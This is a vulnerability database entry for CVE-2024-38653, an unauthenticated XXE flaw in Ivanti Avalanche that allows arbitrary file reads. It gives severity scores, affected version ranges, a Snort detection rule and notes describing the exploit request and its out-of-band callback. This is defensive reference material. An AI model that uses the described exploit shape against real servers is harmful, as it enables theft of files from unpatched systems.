cbcvebase.
CVE-2024-38653
published 2024-08-14

CVE-2024-38653: XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.

PriorityP187high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
91.98%
99.8th percentile
XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.

Affected

14 ranges
VendorProductVersion rangeFixed in
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche
ivantiavalanche>= 6.4.4 < 6.4.46.4.4

Detection & IOCsextracted from sources · hover to see the quote

url/mdm/checkin
bytes
|3c 3f|xml
bytes
|3c 21|ENTITY|20 25|
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti Avalanche SmartDeviceServer XML External Entity Injection (CVE-2024-38653)"; flow:established,to_server; http.method; content:"PUT"; http.uri; content:"/mdm/checkin"; fast_pattern; http.request_body; content:"|3c 3f|xml"; startswith; content:"|3c 21|ENTITY|20 25|"; distance:0; reference:url,github.com/pwnfuzz/POCs/tree/main/CVE%202024-38653; reference:cve,2024-38653; classtype:web-application-attack; sid:2059880; rev:1; metadata:affected_product Ivanti, attack_target Server, tls_state TLSDecrypt, created_at 2025_02_04, cve CVE_2024_38653, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence Medium, signature_severity Major, tag Exploit, updated_at 2025_02_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit traffic is a PUT request to /mdm/checkin with Content-Type: application/xml, containing an XML body that starts with an XML declaration followed by a DOCTYPE with an ENTITY % declaration — characteristic of a blind/OOB XXE payload.
  • The exploit triggers an outbound HTTP callback from the server; detection via interactsh/OOB channel shows the callback User-Agent is 'Java', indicating the server-side XML parser is Java-based (e.g., Java's built-in SAX/DOM parser).
  • The Snort/ET rule keys on: HTTP PUT method + URI /mdm/checkin + request body starting with XML declaration bytes (3c 3f = '<?') followed by ENTITY % bytes (3c 21 = '<!', 20 25 = ' %') — all three conditions must match to fire.
  • The vulnerability is unauthenticated — no session cookie or Authorization header is required. Any PUT to /mdm/checkin with a malicious XML body should be treated as a potential exploit attempt.
  • ·The ET Snort rule (sid:2059880) requires TLS decryption to be effective against HTTPS traffic, as noted in the metadata.
  • ·The Nuclei template uses an interactsh OOB callback to confirm exploitation; the matcher checks for an inbound HTTP request with User-Agent containing 'Java'. Environments without OOB/interactsh infrastructure will not be able to confirm exploitation using this template as-is.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv3.08.2HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.